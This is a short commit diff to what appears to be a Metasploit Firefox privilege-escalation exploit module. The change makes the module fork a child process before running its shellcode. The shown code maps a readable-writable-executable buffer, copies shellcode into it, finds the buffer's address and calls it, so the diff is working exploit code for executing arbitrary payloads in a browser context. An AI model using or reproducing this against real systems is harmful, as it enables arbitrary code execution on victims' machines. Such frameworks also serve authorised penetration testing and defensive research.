Add posix fork() call before running code.

bug/bundler_fix
Joe Vennix 2014-03-12 02:56:26 -05:00
parent 7afcb6aee8
commit 851fca2107
1 changed files with 7 additions and 1 deletions


@ -52,6 +52,10 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
ctypes.voidptr_t, /* src */ ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */ ctypes.size_t /* size to copy */
); );
var fork = lib.declare('fork',
ctypes.default_abi, /* calling convention */
ctypes.int /* return type */
);
var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0); var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
var cstr = ctypes.jschar.array()(shellcode); var cstr = ctypes.jschar.array()(shellcode);
//var bytes = ctypes.char.array()(shellcode).length-1; //var bytes = ctypes.char.array()(shellcode).length-1;
@ -59,7 +63,9 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
/* there is probably a better way to do this */ /* there is probably a better way to do this */
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
if (!m) throw new Error("Could not find address of buffer."); if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))(); if (fork() == 0) {
ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
}
}; };
var execWindows = function() { var execWindows = function() {